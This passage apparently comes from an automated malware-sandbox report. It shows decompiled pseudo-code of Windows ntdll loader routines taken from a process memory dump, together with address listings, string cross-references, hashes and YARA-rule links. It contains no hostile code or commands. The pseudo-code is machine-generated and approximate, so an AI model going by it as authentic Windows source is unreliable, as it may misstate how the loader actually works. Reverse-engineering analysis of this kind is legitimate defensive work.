						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0481F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04821370(_t276, 0x47b4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0481BB40(0,  &_v68, _t170);
									if(L047E43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0481BB40(_t257,  &_v68, _t243);
								if(L047E43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04821370(_t278, 0x47b4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L047F4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0481F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04821370(_v16, 0x47b4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0481BB40(_t262,  &_v68, _t244);
								if(L047E43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04821370(_t282, 0x47b4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0481BB40(_t262,  &_v68, _t201);
							if(L047E43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L047F4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0481F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04821370(_t280, 0x47b4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0481BB40(_t267,  &_v68, _t245);
							if(L047E43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04821370(_t284, 0x47b4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0481BB40(_t267,  &_v68, _t224);
						if(L047E43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                        0x047e3d3c
                                                        0x047e3d42
                                                        0x047e3d44
                                                        0x047e3d46
                                                        0x047e3d49
                                                        0x047e3d4c
                                                        0x047e3d4f
                                                        0x047e3d52
                                                        0x047e3d55
                                                        0x047e3d58
                                                        0x047e3d5b
                                                        0x047e3d5f
                                                        0x047e3d61
                                                        0x047e3d66
                                                        0x04838213
                                                        0x04838218
                                                        0x047e4085
                                                        0x047e4088
                                                        0x047e408e
                                                        0x047e4094
                                                        0x047e409a
                                                        0x047e40a0
                                                        0x047e40a6
                                                        0x047e40a9
                                                        0x047e40af
                                                        0x047e40b6
                                                        0x047e40bd
                                                        0x047e40bd
                                                        0x047e3d83
                                                        0x0483821f
                                                        0x04838229
                                                        0x04838238
                                                        0x04838238
                                                        0x0483823d
                                                        0x0483823d
                                                        0x047e3da0
                                                        0x047e3daf
                                                        0x047e3db5
                                                        0x047e3dba
                                                        0x047e3dba
                                                        0x047e3dd4
                                                        0x047e3e94
                                                        0x047e3eab
                                                        0x047e3f6d
                                                        0x047e3f84
                                                        0x047e406b
                                                        0x047e406b
                                                        0x047e406e
                                                        0x047e406e
                                                        0x047e4070
                                                        0x047e4074
                                                        0x04838351
                                                        0x04838351
                                                        0x047e407a
                                                        0x047e407f
                                                        0x0483835d
                                                        0x04838370
                                                        0x04838377
                                                        0x04838379
                                                        0x0483837c
                                                        0x0483837c
                                                        0x0483835d
                                                        0x00000000
                                                        0x047e407f
                                                        0x047e3f8a
                                                        0x047e3f8d
                                                        0x047e3f90
                                                        0x047e3f95
                                                        0x0483830d
                                                        0x0483830f
                                                        0x047e3f9b
                                                        0x047e3fac
                                                        0x047e3fae
                                                        0x047e3fb1
                                                        0x047e3fb1
                                                        0x047e3fb6
                                                        0x04838317
                                                        0x0483831a
                                                        0x00000000
                                                        0x047e3fbc
                                                        0x047e3fc1
                                                        0x047e3fc9
                                                        0x047e3fd7
                                                        0x047e3fda
                                                        0x047e3fdd
                                                        0x047e4021
                                                        0x047e4021
                                                        0x047e4029
                                                        0x047e4030
                                                        0x047e4044
                                                        0x047e4046
                                                        0x047e4046
                                                        0x047e4044
                                                        0x047e4049
                                                        0x04838327
                                                        0x04838334
                                                        0x04838339
                                                        0x0483833c
                                                        0x047e404f
                                                        0x047e404f
                                                        0x047e404f
                                                        0x047e4051
                                                        0x047e4056
                                                        0x047e4063
                                                        0x047e4063
                                                        0x047e4068
                                                        0x00000000
                                                        0x047e4068
                                                        0x047e3fdf
                                                        0x047e3fe2
                                                        0x047e3fe4
                                                        0x047e3fe7
                                                        0x047e3fef
                                                        0x047e4003
                                                        0x047e4005
                                                        0x047e4005
                                                        0x047e400c
                                                        0x047e4013
                                                        0x047e4016
                                                        0x047e4017
                                                        0x047e401b
                                                        0x047e401e
                                                        0x00000000
                                                        0x047e401e
                                                        0x047e3fb6
                                                        0x047e3eb1
                                                        0x047e3eb4
                                                        0x047e3eb7
                                                        0x047e3ebc
                                                        0x048382a9
                                                        0x048382ab
                                                        0x047e3ec2
                                                        0x047e3ed3
                                                        0x047e3ed5
                                                        0x047e3ed8
                                                        0x047e3ed8
                                                        0x047e3edd
                                                        0x048382b3
                                                        0x048382b6
                                                        0x00000000
                                                        0x047e3ee3
                                                        0x047e3ee8
                                                        0x047e3eed
                                                        0x047e3ef0
                                                        0x047e3ef3
                                                        0x047e3f02
                                                        0x047e3f05
                                                        0x047e3f08
                                                        0x048382c0
                                                        0x048382c3
                                                        0x048382c5
                                                        0x048382c8
                                                        0x048382d0
                                                        0x048382e4
                                                        0x048382e6
                                                        0x048382e6
                                                        0x048382ed
                                                        0x048382f4
                                                        0x048382f7
                                                        0x048382f8
                                                        0x048382fc
                                                        0x048382ff
                                                        0x048382ff
                                                        0x047e3f0e
                                                        0x047e3f11
                                                        0x047e3f16
                                                        0x047e3f1d
                                                        0x047e3f31
                                                        0x04838307
                                                        0x04838307
                                                        0x047e3f31
                                                        0x047e3f39
                                                        0x047e3f48
                                                        0x047e3f4d
                                                        0x047e3f50
                                                        0x047e3f50
                                                        0x047e3f53
                                                        0x047e3f58
                                                        0x047e3f65
                                                        0x047e3f65
                                                        0x047e3f6a
                                                        0x00000000
                                                        0x047e3f6a
                                                        0x047e3edd
                                                        0x047e3dda
                                                        0x047e3ddd
                                                        0x047e3de0
                                                        0x047e3de5
                                                        0x04838245
                                                        0x047e3deb
                                                        0x047e3df7
                                                        0x047e3dfc
                                                        0x047e3dfe
                                                        0x047e3e01
                                                        0x047e3e01
                                                        0x047e3e06
                                                        0x0483824d
                                                        0x0483824f
                                                        0x04838254
                                                        0x00000000
                                                        0x047e3e0c
                                                        0x047e3e11
                                                        0x047e3e16
                                                        0x047e3e19
                                                        0x047e3e29
                                                        0x047e3e2c
                                                        0x047e3e2f
                                                        0x0483825c
                                                        0x0483825f
                                                        0x04838261
                                                        0x04838264
                                                        0x0483826c
                                                        0x04838280
                                                        0x04838282
                                                        0x04838282
                                                        0x04838289
                                                        0x04838290
                                                        0x04838293
                                                        0x04838294
                                                        0x04838298
                                                        0x0483829b
                                                        0x0483829b
                                                        0x047e3e35
                                                        0x047e3e38
                                                        0x047e3e3d
                                                        0x047e3e44
                                                        0x047e3e58
                                                        0x048382a3
                                                        0x048382a3
                                                        0x047e3e58
                                                        0x047e3e60
                                                        0x047e3e6f
                                                        0x047e3e74
                                                        0x047e3e77
                                                        0x047e3e77
                                                        0x047e3e7a
                                                        0x047e3e7f
                                                        0x047e3e8c
                                                        0x047e3e8c
                                                        0x047e3e91
                                                        0x00000000
                                                        0x047e3e91

                                                        Strings
                                                        • Kernel-MUI-Language-SKU, xrefs: 047E3F70
                                                        • Kernel-MUI-Language-Allowed, xrefs: 047E3DC0
                                                        • Kernel-MUI-Number-Allowed, xrefs: 047E3D8C
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 047E3E97
                                                        • WindowsExcludedProcs, xrefs: 047E3D6F
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 0-258546922
                                                        • Opcode ID: 7dbd3356f37a7e253da479260bbbcd520afea4dc24df516f39fed6ea09297771
                                                        • Instruction ID: 96a9380bf5d4b714128e17cfefc706f16ea0ef12ce05877874f0416335cfd05c
                                                        • Opcode Fuzzy Hash: 7dbd3356f37a7e253da479260bbbcd520afea4dc24df516f39fed6ea09297771
                                                        • Instruction Fuzzy Hash: F3F14B72D00618EBDB11DF99C984AEEB7B9EF48750F14066AE905E7311E774BE01CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04808E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 44%
                                                        			E04808E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x48cd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x48c8464; // 0x76d30110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x48c5780 & 0x00000003) != 0) {
							E04855510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x48c5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0481B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x48c7984; // 0x663ea0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x48c8464; // 0x76d30110
					 *0x48cb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04809B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x48c5780 & 0x00000005) != 0) {
						_push(_t49);
						E04855510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                        0x04808e0f
                                                        0x04808e16
                                                        0x04808e19
                                                        0x04808e1b
                                                        0x04808e21
                                                        0x04808e7f
                                                        0x04808e85
                                                        0x04849354
                                                        0x0484936c
                                                        0x04849371
                                                        0x0484937b
                                                        0x04849381
                                                        0x04849381
                                                        0x0484937b
                                                        0x04808e9d
                                                        0x04808e9d
                                                        0x04808e29
                                                        0x04808e2c
                                                        0x04808e38
                                                        0x04808e3e
                                                        0x04808e43
                                                        0x04808eb5
                                                        0x04808eb9
                                                        0x048492aa
                                                        0x048492af
                                                        0x048492e8
                                                        0x048492e8
                                                        0x048492af
                                                        0x04808eb9
                                                        0x04808e45
                                                        0x04808e53
                                                        0x04808e5b
                                                        0x04808e5f
                                                        0x04808e78
                                                        0x04808e78
                                                        0x04808e7d
                                                        0x04808ec3
                                                        0x04808ecd
                                                        0x04808ed2
                                                        0x04808ed2
                                                        0x04808ec5
                                                        0x04808ec5
                                                        0x00000000
                                                        0x04808e7d
                                                        0x04808e67
                                                        0x04808ea4
                                                        0x0484931a
                                                        0x00000000
                                                        0x00000000
                                                        0x04849320
                                                        0x04808ea4
                                                        0x04808e70
                                                        0x04849325
                                                        0x04849340
                                                        0x04849345
                                                        0x04849345
                                                        0x04808e76
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Strings
                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 0484933B, 04849367
                                                        • LdrpFindDllActivationContext, xrefs: 04849331, 0484935D
                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0484932A
                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 04849357
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                        • API String ID: 0-3779518884
                                                        • Opcode ID: 8c102176accc249ce9c72258b31848b53ce307fcb84e84aa9c25efcf0a695ef5
                                                        • Instruction ID: 7cf8130f7d5097f1914c518f4f767f6e0421d6a4a8f25fa9a795e8816bed3d36
                                                        • Opcode Fuzzy Hash: 8c102176accc249ce9c72258b31848b53ce307fcb84e84aa9c25efcf0a695ef5
                                                        • Instruction Fuzzy Hash: 4441F572E10319AFDBB0BA18CC49B76B6A4AB44358F05CF69E844D71E1E7707CC086C1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047E8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 83%
                                                        			E047E8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E047E934A() != 0) {
								_t159 = E0485A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x48c5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04855510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x48c5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E047E849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E047E8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E047E8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x48c5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x48c5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E047F2280(_t92, 0x48c86cc);
															_t94 = E048A9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E048061A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x48c5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E047E8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x48c5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x48c5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0481F380(_t136, 0x47b1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E047F2280(_t108, 0x48c86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E048061A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E048A9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E047EFFB0(_t118, _t156, 0x48c86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04819A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                        0x047e8799
                                                        0x047e879d
                                                        0x047e87a1
                                                        0x047e87a3
                                                        0x047e87a8
                                                        0x047e87c3
                                                        0x047e87c3
                                                        0x047e87c8
                                                        0x047e87d1
                                                        0x047e87d4
                                                        0x047e87d8
                                                        0x047e87e5
                                                        0x047e87ec
                                                        0x04839bfe
                                                        0x04839c00
                                                        0x04839c02
                                                        0x04839c08
                                                        0x04839c0d
                                                        0x04839c0f
                                                        0x04839c14
                                                        0x04839c2d
                                                        0x04839c32
                                                        0x04839c37
                                                        0x04839c3a
                                                        0x04839c3c
                                                        0x04839c42
                                                        0x04839c42
                                                        0x04839c3c
                                                        0x04839c02
                                                        0x047e87da
                                                        0x047e87df
                                                        0x047e87e3
                                                        0x00000000
                                                        0x00000000
                                                        0x047e87e3
                                                        0x047e87f2
                                                        0x00000000
                                                        0x047e87fb
                                                        0x047e87fd
                                                        0x047e87fe
                                                        0x047e880e
                                                        0x047e880f
                                                        0x047e8810
                                                        0x047e8814
                                                        0x047e881a
                                                        0x047e881c
                                                        0x047e881f
                                                        0x047e8821
                                                        0x047e8822
                                                        0x047e8824
                                                        0x047e8826
                                                        0x047e882c
                                                        0x047e882e
                                                        0x04839c48
                                                        0x04839c48
                                                        0x047e8834
                                                        0x047e8834
                                                        0x047e8837
                                                        0x00000000
                                                        0x00000000
                                                        0x047e8837
                                                        0x047e882e
                                                        0x047e883d
                                                        0x047e8840
                                                        0x047e8843
                                                        0x047e8846
                                                        0x047e8849
                                                        0x047e884c
                                                        0x047e884e
                                                        0x047e8850
                                                        0x047e8852
                                                        0x047e8854
                                                        0x047e8857
                                                        0x047e88b4
                                                        0x047e88b6
                                                        0x047e88b6
                                                        0x047e8859
                                                        0x047e8859
                                                        0x047e8859
                                                        0x047e8861
                                                        0x047e8866
                                                        0x047e886a
                                                        0x047e893d
                                                        0x047e8941
                                                        0x00000000
                                                        0x047e8947
                                                        0x047e8947
                                                        0x047e894a
                                                        0x047e894c
                                                        0x00000000
                                                        0x047e8952
                                                        0x047e8955
                                                        0x047e895a
                                                        0x047e895d
                                                        0x047e895d
                                                        0x047e895f
                                                        0x047e8961
                                                        0x047e8961
                                                        0x047e8968
                                                        0x00000000
                                                        0x00000000
                                                        0x047e896a
                                                        0x047e896b
                                                        0x047e896e
                                                        0x00000000
                                                        0x047e8970
                                                        0x047e8970
                                                        0x047e8970
                                                        0x047e8970
                                                        0x047e8972
                                                        0x047e8972
                                                        0x047e8974
                                                        0x00000000
                                                        0x047e897a
                                                        0x047e897a
                                                        0x047e897d
                                                        0x00000000
                                                        0x047e8983
                                                        0x04839c65
                                                        0x04839c6d
                                                        0x04839c72
                                                        0x04839c75
                                                        0x04839c75
                                                        0x04839c82
                                                        0x04839c86
                                                        0x04839c87
                                                        0x04839c88
                                                        0x04839c89
                                                        0x04839c8c
                                                        0x04839c90
                                                        0x04839c95
                                                        0x04839c97
                                                        0x04839ca0
                                                        0x04839ca3
                                                        0x04839ca9
                                                        0x04839ca9
                                                        0x00000000
                                                        0x04839ca9
                                                        0x04839ca3
                                                        0x00000000
                                                        0x04839c97
                                                        0x047e897d
                                                        0x00000000
                                                        0x047e8974
                                                        0x047e8988
                                                        0x047e8992
                                                        0x047e8996
                                                        0x00000000
                                                        0x047e8996
                                                        0x047e894c
                                                        0x00000000
                                                        0x047e8870
                                                        0x047e887b
                                                        0x047e887d
                                                        0x047e887f
                                                        0x047e8881
                                                        0x047e8884
                                                        0x047e8884
                                                        0x047e8886
                                                        0x047e8889
                                                        0x047e888c
                                                        0x047e888e
                                                        0x047e8891
                                                        0x047e8891
                                                        0x047e8898
                                                        0x00000000
                                                        0x00000000
                                                        0x047e889a
                                                        0x047e889b
                                                        0x047e889e
                                                        0x00000000
                                                        0x00000000
                                                        0x047e88a0
                                                        0x047e88a8
                                                        0x047e88b0
                                                        0x047e88b2
                                                        0x047e88d3
                                                        0x047e88d5
                                                        0x00000000
                                                        0x047e88d7
                                                        0x047e88db
                                                        0x047e88dc
                                                        0x047e88e0
                                                        0x047e88e8
                                                        0x047e88ee
                                                        0x047e88f0
                                                        0x047e88f3
                                                        0x047e88fc
                                                        0x047e8901
                                                        0x047e8906
                                                        0x047e890c
                                                        0x047e890c
                                                        0x047e890f
                                                        0x047e8916
                                                        0x047e8917
                                                        0x047e8918
                                                        0x047e8919
                                                        0x047e891a
                                                        0x047e891f
                                                        0x047e8921
                                                        0x04839c52
                                                        0x04839c55
                                                        0x04839c5b
                                                        0x04839cac
                                                        0x04839cc0
                                                        0x04839cc0
                                                        0x04839c55
                                                        0x047e8927
                                                        0x047e8927
                                                        0x047e892f
                                                        0x047e8933
                                                        0x00000000
                                                        0x047e88f5
                                                        0x047e88f5
                                                        0x00000000
                                                        0x047e88f7
                                                        0x047e88f7
                                                        0x047e88fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047e88fa
                                                        0x047e88f5
                                                        0x047e88f3
